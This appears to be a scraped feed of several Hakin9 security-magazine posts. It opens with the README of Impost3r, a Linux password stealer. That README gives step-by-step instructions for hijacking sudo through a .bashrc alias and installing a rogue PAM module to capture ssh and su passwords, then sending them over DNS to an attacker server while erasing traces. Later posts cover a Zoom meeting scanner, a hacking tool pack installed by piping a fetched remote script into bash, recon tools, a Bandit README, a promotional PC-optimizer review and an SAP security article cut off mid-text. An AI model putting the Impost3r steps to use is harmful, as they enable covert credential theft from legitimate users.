Attackers can use Impost3r to make a trap to steal the legal user's passwords XD

This tool is limited to security research and teaching, and the user bears all legal and related responsibilities caused by the use of this tool! The author does not assume any legal and related responsibilities!

Features

• Automatically clean the track
• Use DNS to transfer the result
• Really hard for legal users can feel this attack

Dependencies

• GCC

Usage

Impost3r can be used to steal passwords including sudo, su, and ssh services. These three services can be roughly divided into two categories, sudo, and ssh/su. I will discuss them below

Steal sudo password

Only need ordinary user's privilege, and can only steal the current user's password.

• First I will assume that attacker has controlled a server and the privilege is an ordinary user
• Then copy the original .bashrc file cp ～/.bashrc /tmp/, and put this copy anywhere you like(In this case, I will use /tmp/)
• Edit the original .bashrc, and add following sentences at the end of file(The param "/tmp/.impost3r" must be as the same as the following FILENAME you specified):

alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'

• Then, save it and run source ~/.bashrc
• After that,attacker needs to edit the source code of Impost3r/sudo/main.c:

/*
    Custom setting
*/
# define FILENAME "/tmp/.impost3r" \\Set the location where the Impost3r is on the server you attack.
# define BACKUP_BASHRC "/tmp/.bashrc" \\Set the location where the backup .bashrc is on the server you attack.
# define SAVE_OR_SEND 0 \\Set the method you want to apply when Impost3r get the password,(send to your server=0,save the result on the current server=1,default is send)
/*
    Send to server
*/
# define MAX_RESEND 30 \\Set the maximum times that Impost3r will try to resends stealing result to attacker's server
# define RESEND_INTERVAL 5 \\Set the interval of resending stealing result.
# define REMOTE_ADDRESS "192.168.0.12" \\Set the malicious server ip address that you want to receive stealing result
# define REMOTE_PORT 53 \\Set the malicious server port

/*
    Save to local
*/
# define SAVE_LOCATION "/tmp/.cache" \\Set the result file location if you want to save the result on the server

• Save the source code, and run make
• Get the .impost3r file after compiling.
• Upload .impost3r file to the target server and put it under the FILENAME you specified.
• The last thing you should do is run a DNS server service on your server(REMOTE_ADDRESS)'s port(REMOTE_PORT), and waiting for the bonus.

Demo

Tips

• When Impost3r steals the sudo password successfully, it will automatically clean the traces it makes on the target server.

Steal ssh/su password

Stealing the ssh/su password is different from the sudo password-stealing method above. You need root privilege. And this method can steal all user's password

The following uses Ubuntu as an example, Centos is similar, but the file locations mentioned may be slightly different

• First, assume that the attacker controls a server, and gets the root privilege
• Then edit the /ssh_su/main.c source code file of Impost3r

/*
    Custom setting
*/
# define SSH_OR_BOTH 0 \\Set stealing mode, 0 means only steal ssh password, 1 means steal ssh and su password, the default is 0 (the difference will be mentioned later)
# define SAVE_OR_SEND 0 \\Set the method you want to apply when Impost3r get the password,(send to your server=0,save the result on the current server=1,default is send)

/*
    Send to server
*/
# define MAX_RESEND 30 \\Set the maximum times that Impost3r will try to resends stealing result to attacker's server(This option is valid only when SSH_OR_BOTH is 0)
# define RESEND_INTERVAL 5 \\Set the interval of resending stealing result.(This option is valid only when SSH_OR_BOTH is 0)
# define REMOTE_ADDRESS "192.168.0.12" \\Set the malicious server ip address that you want to receive stealing result
# define REMOTE_PORT 53 \\Set the malicious server port

/*
    Save to local
*/
# define SAVE_LOCATION "/tmp/.sshsucache" \\Set the result file location if you want to save the result on the server

• After the modification is completed, save and execute ```make''` in the current directory
• Get the compiled file impost3r.so
• Upload the compiled impost3r.so to the target server under /lib/x86_64-linux-gnu/security folder.(Different machines may have different folder names)
• Enter /etc/pam.d, and then there are two cases. If the selected mode is to steal only the ssh password, then you need to execute vi sshd and add at the following statement at the end of the file.

auth optional impost3r.so
account optional impost3r.so

• Save and exit, restart the sshd service service sshd restart
• But if you choose to steal the ssh and su passwords together, you need to execute vi common-auth, add the same statement, save and exit and restart the sshd service
• The attacker starts the DNS server program on his server, waiting for a legitimate user to log on the target server via ssh or use su to switch users to get the passwords.

Demo

Tips

• In the case of stealing the ssh/su password, Impost3r cannot clear the traces due to permission reasons, so the attacker needs to clear them himself
• Please note that if you set to steal only ssh passwords, you can be guaranteed that you will receive the stolen results nearly 100 percent, but if you set to steal both, you will not be guaranteed that you will receive the results 100 percent. (Choose to save result locally won't have this problem, only DNS will)
• It is not recommended to steal the su password since the user's ssh password is the same as the su password. It's pretty enough to have a ssh password I think.

Attention

• The Dns server program I use is Fdns, and I change some params, you can find the changed source code under the Fdns folder, and use gcc -o dns main.c util.c to compile it by yourself. And actually you can use any kind of DNS server, but the DNS server you use must make a DNS response to the client instead of just recording DNS request(You also need recording DNS request, or you will lose the stealing result).
• This project is coding just for fun, the logic structure and code structure are not strict enough, please don't be so serious about it, and also welcome suggestions and pairs.

Thanks

• Fdns

The post Impost3r - tool that aim to steal many kinds of linux passwords appeared first on Hakin9 - IT Security Magazine.

Tangalanga is a Zoom Conference scanner. This scanner will check for a random meeting id and return information if available.

Usage

Those are all the possible flags:

tangalanga \
    -token=user-token \   # [default: env TOKEN]  user token to use.

    -colors=false \       # [default: true]    enable/disable colors
    -censor=true \        # [default: false]   censors output
    -output=history \     # [default: stdout]  write found meetings to file
    -debug=true \         # [default: false]   show all the attmpts
    -tor=true \           # [default: false]   enable tor connection (will use default socks proxy)
    -hidden=true \        # [default: false]   enable embedded tor connection (only linux)
    -rate=7 \             # [default: ncpu]    overwrite the default worker pool

    -proxy=socks5://... \ # [default: socks5://127.0.0.1:9150]   proxy url to use

Tokens

Unfortunately, I couldn't find the way the tokens are being generated but the core concept is that the zpk cookie key is being sent during a Join will be usable for ~24 hours before expiring. This makes trivial to join several known meetings, gather some tokens, and then use them for the scans.

TOR (only Linux)

Tangalanga has a tor runtime embedded so it can connect to the onion network and run the queries there instead of exposing your own IP.

For any other system, I recommend a VPN

Why the bizarre name?

This makes reference to a famous 80s/90s personality in the Rio de la Plata. Doctor Tangalanga who loved to do phone pranks.

The post Tangalanga: the Zoom conference scanner hacking tool appeared first on Hakin9 - IT Security Magazine.

Normally, I don’t pay much attention to what’s going on with my computer. After all, I have no reason to since I've never run into major PC issues. I mostly use my laptop for streaming services like YouTube or to watch movies, or shop online, nothing of the heavy stuff.

But recently, the applications started to drag themselves, and sometimes even refused to load. Evidently, my PC needed a performance boost and I knew that I could do that using Windows 10 built-in tools. But, I’m not a Windows expert and I didn’t even know where to start the process. Plus, what if I messed up the settings only to make things worse? It wasn’t a chance I was willing to take. 

Although there have been heated discussions questioning the effectiveness of optimization tools in general, I decided it couldn’t hurt to try one. After all, I could easily undo any changes made to my system using Windows System Restore.

So I turned to Google and searched for PC optimization tools. I decided to download Outbyte PC Repair because it had a free trial version. 

While installing, I made sure that every security feature on my Windows PC was turned on to keep the PC repair tool in check in case it threw some red flags. The installation went smoothly and I didn’t get any warnings from Windows Defender. 

How to Use Outbyte PC Repair?

When I launched the program, it automatically started scanning the computer. At first, all the details being displayed were a bit confusing since there was a lot of information on the overview screen. But, as soon as the scan finished and everything was grouped together, I quickly understood what each category covered. These included corrupted files, disk space, passwords, website notifications, and security holes, etc. 

To view the details of each of the detected issues, I clicked the “Details” link to see additional information about the exact issues that were affecting my PC's performance.

For instance, I noticed that some of the websites were categorized as suspicious, phishing, scam, spam, ads/pop-ups sites. Upon checking the details, I discovered that 7 sites were categorized as malware or virus and I couldn’t even recall ever visiting them.

I also noticed that 11 duplicate passwords were likely to be compromised by websites that stored my passwords. 

I wanted to fix them all instantly because, as I said, I use my computer for online transactions when I shop and couldn’t imagine my data getting in the wrong hands. So, I clicked the “Start Repair” button on the main screen and the repair process kicked off.

The repair didn't take long and I watched the progress of how the tool was working on cleaning and optimizing my computer. I did notice that it skipped some of the options like 'Website Notifications" and 'Malware". 

Regardless, after the repair was complete, my apps were revived and they opened instantly. Even the network seemed to have improved since I didn't experience any buffing time while watching YouTube videos.

But I didn’t stop there. I’ve decided to try the Real-Time Privacy Protection feature under the Privacy tab in the ‘Power Tools’ section that allowed me to turn on several safety features like daily browser cleanup, safe web search, and file shredder. I also enabled the option to detect websites that displayed pop-ups and stop apps from collecting and transmitting personal data which was very important for my privacy protection. 

The tool recommended running a rescan to resolve all the detected issues, which I did. And as promised, most issues were resolved. My PC was already boosted and over 1.5 GB of PC junk was removed.

Conclusion

From my experience, it's clear that PC optimization tools like Outbyte PC Repair are safe to use and can really help in boosting a PC’s performance. These tools are necessary to keep your PC slim by preventing the accumulation of leftover junk files and allowing the uninstallation of bloatware even if all you do is watch YouTube videos. While each tool is designed differently and might have certain limitations, a regular PC maintenance with any of them will improve your system performance. It all boils down to your personal preference.

As for me, the Outbyte PC Repair fixed the unresponsive apps on my Windows laptop and brought to my attention privacy issues that I didn’t even think about. Now I can safely transact online without having to worry about exposing my confidential data.

About the Author:

Elisa Stewart, IT and software trends researcher, medium.com contributor.

The post Are PC Optimization Tools Safe? appeared first on Hakin9 - IT Security Magazine.

Fsociety is a penetration testing system comprises of all penetration testing devices that a programmer needs. It incorporates every one of the devices associated with the Mr. Robot Series. The tool comprises an immense device list beginning structure Information social event to Post Exploitation.

Menu

• Information Gathering
• Password Attacks
• Wireless Testing
• Exploitation Tools
• Sniffing & Spoofing
• Web Hacking
• Private Web Hacking
• Post Exploitation
• Contributors
• Install & Update

Information Gathering:

• Nmap
• Setoolkit
• Host To IP
• WPScan
• CMS Scanner
• XSStrike
• Dork - Google Dorks Passive Vulnerability Auditor
• Scan A server's Users
• Crips

Password Attacks:

• Cupp
• Ncrack

Wireless Testing:

• Reaver
• Pixiewps
• Bluetooth Honeypot

Exploitation Tools:

• ATSCAN
• sqlmap
• Shellnoob
• Commix
• FTP Auto Bypass
• JBoss Autopwn

Sniffing & Spoofing:

• Setoolkit
• SSLtrip
• pyPISHER
• SMTP Mailer

Web Hacking:

• Drupal Hacking
• Inurlbr
• WordPress & Joomla Scanner
• Gravity Form Scanner
• File Upload Checker
• WordPress Exploit Scanner
• WordPress Plugins Scanner
• Shell and Directory Finder
• Joomla! 1.5 - 3.4.5 remote code execution
• Vbulletin 5.X remote code execution
• BruteX - Automatically brute force all services running on a target
• Arachni - Web Application Security Scanner Framework

Private Web Hacking:

• Get all websites
• Get joomla websites
• Get wordpress websites
• Control Panel Finder
• Zip Files Finder
• Upload File Finder
• Get server users
• SQli Scanner
• Ports Scan (range of ports)
• Ports Scan (common ports)
• Get server Info
• Bypass Cloudflare

Post Exploitation:

• Shell Checker
• POET
• Weeman

Installation

Installation Linux

bash <(wget -qO- https://git.io/vAtmB)

Follow This Video HackerSploit

Installation

Download Termux

bash <(wget -qO- https://git.io/vAtmB)

Follow This Video Arif - Tech

Installation Windows

Download Linux Bash Like Cygwin

Download Python

Use Google Cloud Console Cloud Shell

Or Use Free Ubuntu VPS c9.io

Docker Usage

Dependencies

Docker

Docker-compose

docker-compose build
docker-compose up -d
docker-compose exec fsociety fsociety
docker-compose down # destroys instance

Screenshots

Join the team

Do you want to collaborate? Join the project at https://crowdforge.io/projects/409

https://github.com/Manisso/fsociety

Donate

• Bitcoin = 3N8i3Xpi15E11M2zPUm5kPhGjnPSLXcWFt
• Ethereum = 0xa891e54169182a93cacba41288d16aaffa537503

The post Fsociety Hacking Tools Pack - A Penetration Testing Framework appeared first on Hakin9 - IT Security Magazine.

Recox v1.0 is the script that aims to help in classifying vulnerabilities in web applications. The methodology RecoX is arising can spot weaknesses other than OWASP top ten. The script presents information against the target system. It gathers the information recursively over each subdomain, and IP addr for a sophisticated attack. RecoX automates several functions and saves a significant amount of time that requires a manual penetration test. For more detail please read this document.

Usage

git clone https://github.com/samhaxr/recox
chmod +x recox.sh
./recox.sh

Paste the below command to run the tool from anywhere in the terminal.

mv recox.sh /usr/local/bin/recox

The deep scanner comprises many check-ups including subdomain takeover, A record, passive scan, active scan, CORS misconfiguration, zone transfer test, and web content discovery.

Youtube Tutorial

More: https://github.com/samhaxr/recox

The post Recox - Master script for web reconnaissance appeared first on Hakin9 - IT Security Magazine.

The post Cybersecurity Exposure Index: The Most Exposed Countries appeared first on Hakin9 - IT Security Magazine.

In this video from our Advanced Linux Exploit Development online course instructed by our author and reviewer, Ali Abdollahi,  we'll see how to exploit buffer overflow with shellcode. It's a simple example that will allow you to understand the intricacies of this technique and use it for work and for fun. Dive in! 

This course is designed for security experts who want to combine vulnerability knowledge with offensive programming and system skills to take over a Linux-based environment. The course will cover all aspects of Linux exploitation.

Your instructor: Ali Abdollahi

An information security consultant with over 8 years of experience working in a variety of security fields. Currently the cybersecurity division manager, Instructor, author, and board of review member at Hakin9, Pentest & eForensic magazines. Ali is a self-confessed bug hunter, publisher of many vulnerabilities and CVEs, author of books and some articles in the field of cybersecurity. Ali is a regular speaker at industry conferences.

Who is this course for? 

Penetration testers, Vulnerability researchers, Security Analysts, DevOps/DevSecOps, Bug hunters

Why take it NOW? 

Today, every pentester and security expert wanting to take their skills to the next level and stand out from the crowd should look into exploit development. This course will give you a deep understanding of advanced exploit development in the Linux environment.

Why THIS course? 

This is the ultimate guide and training you can find to cover Linux exploit development essentials and advanced topics. It’s hands-on and practical, and you can start applying your new skills in your work right away.

In Module 1: 

This module reviews essentials of Linux stack overflow vulnerabilities and the required debugging tools. Everything will be covered in practical scenarios, through finding stack overflow vulnerabilities, binary exploitation, and executing shellcode.

Covered topics: Linux Internals, Buffer overflow in Linux, Heap overflow, ELF, PLT, GOT, SGID, SUID, Abusing EIP

Related content:

Advanced Linux Exploit Development (W52)

Bypassing WAFs with WAFNinja [FREE COURSE CONTENT]

Programming and Exploitation: Top Hakin9 Tutorials

Web Application Attacks and API Hacking (W51)

The post Buffer Overflow Shellcode [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.

[1] Spider Directories

[2] Find Sub Domain

[3] Advanced Dorks Search

[4] Scan list of Dorks

[5] Scan WebSites [Xss,Sql,Html Inj]

[6] Reverse Ip Lookup

[7] Port Scan

Installation:

git clone https://github.com/RedVirus0/BlackDir-Framework.git cd BlackDir pip3 install -r requirements.txt python3 BlackDir.py

More: https://github.com/RedVirus0/BlackDir-Framework

The post BlackDir-Framework: Web Application Vulnerability Scanner appeared first on Hakin9 - IT Security Magazine.

Bandit is a tool designed to find common security issues in Python code. To do this Bandit processes each file, builds an AST from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report.

Bandit was originally developed within the OpenStack Security Project and later rehomed to PyCQA.

Installation

Bandit is distributed on PyPI. The best way to install it is with pip:

Create a virtual environment (optional):

virtualenv bandit-env
# Or if you're working with a Python 3 project
python3 -m venv bandit-env
# And activate it:
source bandit-env/bin/activate

Install Bandit:

pip install bandit
# Or if you're working with a Python 3 project
pip3 install bandit

Run Bandit:

bandit -r path/to/your/code

Bandit can also be installed from source. To do so, download the source tarball from PyPI, then install it:

python setup.py install

Usage

Example usage across a code tree:

bandit -r ~/your_repos/project

Example usage across the examples/ directory, showing three lines of context and only reporting on the high-severity issues:

bandit examples/*.py -n 3 -lll

Bandit can be run with profiles. To run Bandit against the examples directory using only the plugins listed in the ShellInjection profile:

bandit examples/*.py -p ShellInjection

Bandit also supports passing lines of code to scan using standard input. To run Bandit with standard input:

cat examples/imports.py | bandit -

Usage:

$ bandit -h
usage: bandit [-h] [-r] [-a {file,vuln}] [-n CONTEXT_LINES] [-c CONFIG_FILE]
              [-p PROFILE] [-t TESTS] [-s SKIPS] [-l] [-i]
              [-f {csv,custom,html,json,screen,txt,xml,yaml}]
              [--msg-template MSG_TEMPLATE] [-o [OUTPUT_FILE]] [-v] [-d] [-q]
              [--ignore-nosec] [-x EXCLUDED_PATHS] [-b BASELINE]
              [--ini INI_PATH] [--exit-zero] [--version]
              [targets [targets ...]]

Bandit - a Python source code security analyzer

positional arguments:
  targets               source file(s) or directory(s) to be tested

optional arguments:
  -h, --help            show this help message and exit
  -r, --recursive       find and process files in subdirectories
  -a {file,vuln}, --aggregate {file,vuln}
                        aggregate output by vulnerability (default) or by
                        filename
  -n CONTEXT_LINES, --number CONTEXT_LINES
                        maximum number of code lines to output for each issue
  -c CONFIG_FILE, --configfile CONFIG_FILE
                        optional config file to use for selecting plugins and
                        overriding defaults
  -p PROFILE, --profile PROFILE
                        profile to use (defaults to executing all tests)
  -t TESTS, --tests TESTS
                        comma-separated list of test IDs to run
  -s SKIPS, --skip SKIPS
                        comma-separated list of test IDs to skip
  -l, --level           report only issues of a given severity level or higher
                        (-l for LOW, -ll for MEDIUM, -lll for HIGH)
  -i, --confidence      report only issues of a given confidence level or
                        higher (-i for LOW, -ii for MEDIUM, -iii for HIGH)
  -f {csv,custom,html,json,screen,txt,xml,yaml}, --format {csv,custom,html,json,screen,txt,xml,yaml}
                        specify output format
  --msg-template MSG_TEMPLATE
                        specify output message template (only usable with
                        --format custom), see CUSTOM FORMAT section for list
                        of available values
  -o [OUTPUT_FILE], --output [OUTPUT_FILE]
                        write report to filename
  -v, --verbose         output extra information like excluded and included
                        files
  -d, --debug           turn on debug mode
  -q, --quiet, --silent
                        only show output in the case of an error
  --ignore-nosec        do not skip lines with # nosec comments
  -x EXCLUDED_PATHS, --exclude EXCLUDED_PATHS
                        comma-separated list of paths (glob patterns
                        supported) to exclude from scan (note that these are
                        in addition to the excluded paths provided in the
                        config file) (default:
                        .svn,CVS,.bzr,.hg,.git,__pycache__,.tox,.eggs,*.egg)
  -b BASELINE, --baseline BASELINE
                        path of a baseline report to compare against (only
                        JSON-formatted files are accepted)
  --ini INI_PATH        path to a .bandit file that supplies command line
                        arguments
  --exit-zero           exit with 0, even with results found
  --version             show program's version number and exit

CUSTOM FORMATTING
-----------------

Available tags:

    {abspath}, {relpath}, {line},  {test_id},
    {severity}, {msg}, {confidence}, {range}

Example usage:

    Default template:
    bandit -r examples/ --format custom --msg-template \
    "{abspath}:{line}: {test_id}[bandit]: {severity}: {msg}"

    Provides same output as:
    bandit -r examples/ --format custom

    Tags can also be formatted in python string.format() style:
    bandit -r examples/ --format custom --msg-template \
    "{relpath:20.20s}: {line:03}: {test_id:^8}: DEFECT: {msg:>20}"

    See python documentation for more information about formatting style:
    https://docs.python.org/3/library/string.html

The following tests were discovered and loaded:
-----------------------------------------------

  B101  assert_used
  B102  exec_used
  B103  set_bad_file_permissions
  B104  hardcoded_bind_all_interfaces
  B105  hardcoded_password_string
  B106  hardcoded_password_funcarg
  B107  hardcoded_password_default
  B108  hardcoded_tmp_directory
  B110  try_except_pass
  B112  try_except_continue
  B201  flask_debug_true
  B301  pickle
  B302  marshal
  B303  md5
  B304  ciphers
  B305  cipher_modes
  B306  mktemp_q
  B307  eval
  B308  mark_safe
  B309  httpsconnection
  B310  urllib_urlopen
  B311  random
  B312  telnetlib
  B313  xml_bad_cElementTree
  B314  xml_bad_ElementTree
  B315  xml_bad_expatreader
  B316  xml_bad_expatbuilder
  B317  xml_bad_sax
  B318  xml_bad_minidom
  B319  xml_bad_pulldom
  B320  xml_bad_etree
  B321  ftplib
  B322  input
  B323  unverified_context
  B324  hashlib_new_insecure_functions
  B325  tempnam
  B401  import_telnetlib
  B402  import_ftplib
  B403  import_pickle
  B404  import_subprocess
  B405  import_xml_etree
  B406  import_xml_sax
  B407  import_xml_expat
  B408  import_xml_minidom
  B409  import_xml_pulldom
  B410  import_lxml
  B411  import_xmlrpclib
  B412  import_httpoxy
  B413  import_pycrypto
  B501  request_with_no_cert_validation
  B502  ssl_with_bad_version
  B503  ssl_with_bad_defaults
  B504  ssl_with_no_version
  B505  weak_cryptographic_key
  B506  yaml_load
  B507  ssh_no_host_key_verification
  B601  paramiko_calls
  B602  subprocess_popen_with_shell_equals_true
  B603  subprocess_without_shell_equals_true
  B604  any_other_function_with_shell_equals_true
  B605  start_process_with_a_shell
  B606  start_process_with_no_shell
  B607  start_process_with_partial_path
  B608  hardcoded_sql_expressions
  B609  linux_commands_wildcard_injection
  B610  django_extra_used
  B611  django_rawsql_used
  B701  jinja2_autoescape_false
  B702  use_of_mako_templates
  B703  django_mark_safe

Baseline

Bandit allows specifying the path of a baseline report to compare against using the baseline argument (i.e. -b BASELINE or --baseline BASELINE).

bandit -b BASELINE

This is useful for ignoring known vulnerabilities that you believe are non-issues (e.g. a cleartext password in a unit test). To generate a baseline report simply run Bandit with the output format set to json (only JSON-formatted files are accepted as a baseline) and output file path specified:

bandit -f json -o PATH_TO_OUTPUT_FILE

Version control integration

Use pre-commit. Once you have it installed, add this to the .pre-commit-config.yaml in your repository (be sure to update rev to point to a real git tag/revision!):

repos:
-   repo: https://github.com/PyCQA/bandit
    rev: '' # Update me!
    hooks:
    - id: bandit

Then run pre-commit install and you're ready to go.

Configuration

An optional config file may be supplied and may include:

• lists of tests which should or shouldn't be run
• exclude_dirs - sections of the path, that if matched, will be excluded from scanning (glob patterns supported)
• overridden plugin settings - may provide different settings for some plugins

Per Project Command Line Args

Projects may include a .bandit file that specifies command-line arguments that should be supplied for that project. The currently supported arguments are:

• targets: comma separated list of target dirs/files to run bandit on
• exclude: comma separated list of excluded paths
• skips: comma separated list of tests to skip
• tests: comma separated list of tests to run

To use this, put a .bandit file in your project's directory. For example:

[bandit]
exclude: /test

[bandit]
tests: B101,B102,B301

Exclusions

In the event that a line of code triggers a Bandit issue, but that the line has been reviewed and the issue is a false positive or acceptable for some other reason, the line can be marked with a # nosec and any results associated with it will not be reported.

For example, although this line may cause Bandit to report a potential security issue, it will not be reported:

self.process = subprocess.Popen('/bin/echo', shell=True)  # nosec

Vulnerability Tests

Vulnerability tests or "plugins" are defined in files in the plugins directory.

Tests are written in Python and are autodiscovered from the plugins directory. Each test can examine one or more types of Python statements. Tests are marked with the types of Python statements they examine (for example: function call, string, import, etc).

Tests are executed by the BanditNodeVisitor object as it visits each node in the AST.

Test results are managed in the Manager and aggregated for output at the completion of a test run through the method output_result from Manager instance.

Writing Tests

To write a test:

• Identify a vulnerability to build a test for, and create a new file in examples/ that contains one or more cases of that vulnerability.
• Consider the vulnerability you're testing for, mark the function with one or more of the appropriate decorators: - @checks('Call') - @checks('Import', 'ImportFrom') - @checks('Str')
• Create a new Python source file to contain your test, you can reference existing tests for examples.
• The function that you create should take a parameter "context" which is an instance of the context class you can query for information about the current element being examined. You can also get the raw AST node for more advanced use cases. Please see the context.py file for more.
• Extend your Bandit configuration file as needed to support your new test.
• Execute Bandit against the test file you defined in examples/ and ensure that it detects the vulnerability. Consider variations on how this vulnerability might present itself and extend the example file and the test function accordingly.

Extending Bandit

Bandit allows users to write and register extensions for checks and formatters. Bandit will load plugins from two entry-points:

• bandit.formatters
• bandit.plugins

Formatters need to accept 5 things:

• manager: an instance of bandit manager
• fileobj: the output file object, which may be sys.stdout
• sev_level : Filtering severity level
• conf_level: Filtering confidence level
• lines=-1: number of lines to report

Plugins tend to take advantage of the bandit.checks decorator which allows the author to register a check for a particular type of AST node. For example

@bandit.checks('Call')
def prohibit_unsafe_deserialization(context):
    if 'unsafe_load' in context.call_function_name_qual:
        return bandit.Issue(
            severity=bandit.HIGH,
            confidence=bandit.HIGH,
            text="Unsafe deserialization detected."
        )

To register your plugin, you have two options:

1. If you're using setuptools directly, add something like the following to your setup call:

   # If you have an imaginary bson formatter in the bandit_bson module
   # and a function called `formatter`.
   entry_points={'bandit.formatters': ['bson = bandit_bson:formatter']}
   # Or a check for using mako templates in bandit_mako that
   entry_points={'bandit.plugins': ['mako = bandit_mako']}
   

2. If you're using pbr, add something like the following to your setup.cfg file:

   [entry_points]
   bandit.formatters =
       bson = bandit_bson:formatter
   bandit.plugins =
       mako = bandit_mako
   

Contributing

Follow our Contributing file: https://github.com/PyCQA/bandit/blob/master/CONTRIBUTING.md

Reporting Bugs

Bugs should be reported on github. To file a bug against Bandit, visit: https://github.com/PyCQA/bandit/issues

Show Your Style

Use our badge in your project's README!

using Markdown:

[![security: bandit](https://img.shields.io/badge/security-bandit-yellow.svg)](https://github.com/PyCQA/bandit)

using RST:

.. image:: https://img.shields.io/badge/security-bandit-yellow.svg
    :target: https://github.com/PyCQA/bandit
    :alt: Security Status

Under Which Version of Python Should I Install Bandit?

The answer to this question depends on the project(s) you will be running Bandit against. If your project is only compatible with Python 2.7, you should install Bandit to run under Python 2.7. If your project is only compatible with Python 3.5, then use 3.5 respectively. If your project supports both, you could run Bandit with both versions but you don't have to.

Bandit uses the ast module from Python's standard library in order to analyze your Python code. The ast module is only able to parse Python code that is valid in the version of the interpreter from which it is imported. In other words, if you try to use Python 2.7's ast module to parse code written for 3.5 that uses, for example, yield from with asyncio, then you'll have syntax errors that will prevent Bandit from working properly. Alternatively, if you are relying on 2.7's octal notation of 0777 then you'll have a syntax error if you run Bandit on 3.x.

References

Bandit docs: https://bandit.readthedocs.io/en/latest/

Python AST module documentation: https://docs.python.org/3/library/ast.html

Green Tree Snakes - the missing Python AST docs: https://greentreesnakes.readthedocs.org/en/latest/

Documentation of the various types of AST nodes that Bandit currently covers or could be extended to cover:https://greentreesnakes.readthedocs.org/en/latest/nodes.html

The post Bandit is a tool designed to find common security issues in Python code appeared first on Hakin9 - IT Security Magazine.

MARA is a Mobile Application Reverse engineering and Analysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals.

MARA is developed and maintained by @xtian_kisutsa and @iamckn. It is in its very early stages of development and there is a lot more to come, in line with our roadmap. Any contributions and suggestions to the tool will be highly appreciated.

Features supported

APK Reverse Engineering

• Disassembling Dalvik bytecode to smali bytecode via baksmali and apktool
• Disassembling Dalvik bytecode to java bytecode via enjarify
• Decompiling APK to Java source code via jadx

APK Deobfuscation

• APK deobfuscation via [apk-deguard.com] (http://www.apk-deguard.com/)

APK Analysis

• Parsing smali files for analysis via smalisca
• Dump apk assets, libraries, and resources
• Extracting certificate data via openssl
• Extract strings and app permissions via aapt
• Identify methods and classes via ClassyShark
• Scan for apk vulnerabilities via androbugs
• Analyze apk for potentially malicious behavior via androwarn
• Identify compilers, packers, and obfuscators via APKiD
• Extract execution paths, IP addresses, URL, URI, emails via regex

APK Manifest Analysis

• Extract Intents
• Extract exported activities
• Extract receivers
• Extract exported receivers
• Extract Services
• Extract exported services
• Check if apk is debuggable
• Check if apk allows backups
• Check if apk allows sending of secret codes
• Check if apk can receive binary SMS

Domain Analysis

• Domain SSL scan via pyssltest and testssl
• Website fingerprinting via whatweb

Security Analysis

• Source code static analysis based on OWASP Top Mobile Top 10 and the OWASP Mobile Apps Checklist
• MARA is capable of performing either single or mass analysis of apk, dex or jar files.

Additional information about the framework, prerequisites and the installation guide is available on the wiki

The post MARA is a Mobile Application Reverse engineering and Analysis Framework. appeared first on Hakin9 - IT Security Magazine.

SAP systems are used by many organizations to store and process significant amounts of confidential or sensitive data. This data is incredibly valuable to the organizations themselves, their customers, and attackers. While in the past, most SAP systems were only accessible from within an organization, many workloads are now in the cloud. This makes data more accessible to organizations and to hackers and requires tightened security measures.

In this article, you’ll learn some of the ways in which SAP configurations can be exploited. You’ll also learn some best practices for protecting your systems and preventing attackers from accessing your data.

Potential SAP Security Risks

Understanding how your SAP systems may be at risk is the first step to properly securing your implementation and data. Below are a few of the unique ways that SAP can be vulnerable.

Lack of Encryption for Data in Memory

SAP uses RAM to quickly process and retrieve data but you can’t encrypt this data without decreasing performance. This makes data vulnerable to RAM scraping, a technique that accesses data directly from memory to avoid encryption. It also makes SAP vulnerable to viruses or malware running in memory. These memory-based attacks leave no footprint, making attacks difficult to detect and prevent. 

Public Access Through Internet

You can find many publicly accessible SAP login pages with a simple Internet search. These pages provide a potential direct connection to SAP systems for attackers. In particular, these portals are vulnerable if you haven’t reset the passwords of your default user accounts. The credentials for these accounts are publicly accessible and provide privileged access. 

Likewise, your system is vulnerable if you do not limit the number of login attempts or if you provide overly detailed error messages. Letting an attacker endlessly try to enter or providing information that helps them narrow their attempts is an invitation. Depending on how you handle login inputs, you may also be open to SQL or other code injection attacks.

Insecure Code

Many SAP systems include significant amounts of code for customization. Any vulnerabilities in custom code transfer to your SAP systems and can provide access to otherwise protected systems. The risk potential may be even higher when open-source code is included as it may have functionalities you aren’t aware of. This is particularly true if code isn’t verified to be secure before inclusion. 

Open-source code can contain a variety of both intentional and unintentional vulnerabilities. It can also be redistributed with vulnerabilities or malware added if you take libraries or frameworks from unofficial sources.

Best Practices for Securing Your Systems

Understanding your risks is the first step but understanding can’t provide protection on its own. Rather, you need to combine this knowledge with some data loss prevention and security best practices.

Integrate SAP Security and System Protections

You should use a combination of cybersecurity and SAP security. SAP security measures typically assume that anyone on your network is supposed to be there. Cybersecurity and systemwide measures try to ensure this is the case. 

You should be using monitoring tools that incorporate SAP monitoring data. Response tools and protective measures should apply the same policies across systems for consistency and greater reliability. It is also a good idea to federate your IAM systems. Federation ensures that permissions and roles are linked across systems and makes it easier to manage credentials.

Additionally, you should be monitoring both SAP security releases and external threat data sources. SAP releases cover SAP specific threats but cannot help with protecting your host system. Vulnerability databases and threat intelligence feeds can provide you with information on threats to your overall system. These sources contain information on open-source software and affected systems as well as attacker practices.

Implement Segregation of Duties (SoD) and Role-Based Permissions

You should implement both SoD and role-based restrictions to limit malicious access from both inside and outside your systems. SoD prevents internal abuse of valid privileges by separating vital functions within an organization. For example, users can’t both create new vendors in a system and issue payments to those vendors.

Role-based permissions separate permissions into only those valid for that role. It can help you ensure non-administrative users do not have excessive system control. Role-based permissions make management easier and can help reduce the damage caused with compromised credentials. 

Ensure Strong Passwords

First, make sure that you change the default passwords of SAP generated users. For example, SAP*, DDIC, and SYSTEM. If you are not using these accounts, disable these credentials, don’t just delete accounts. Disabling accounts notifies the system not to allow use; if you just delete, some accounts, such as SAP* can still be used. 

Any passwords you change should be complex and should not match any other credentials. Likewise, you should set complexity requirements for general user passwords and not allow duplication. Passwords should expire after a set period and should not match passwords used in other systems. In SAP, you can use the RSUSR003 report to uncover problem users and help enforce these rules.

Secure Communication Channels

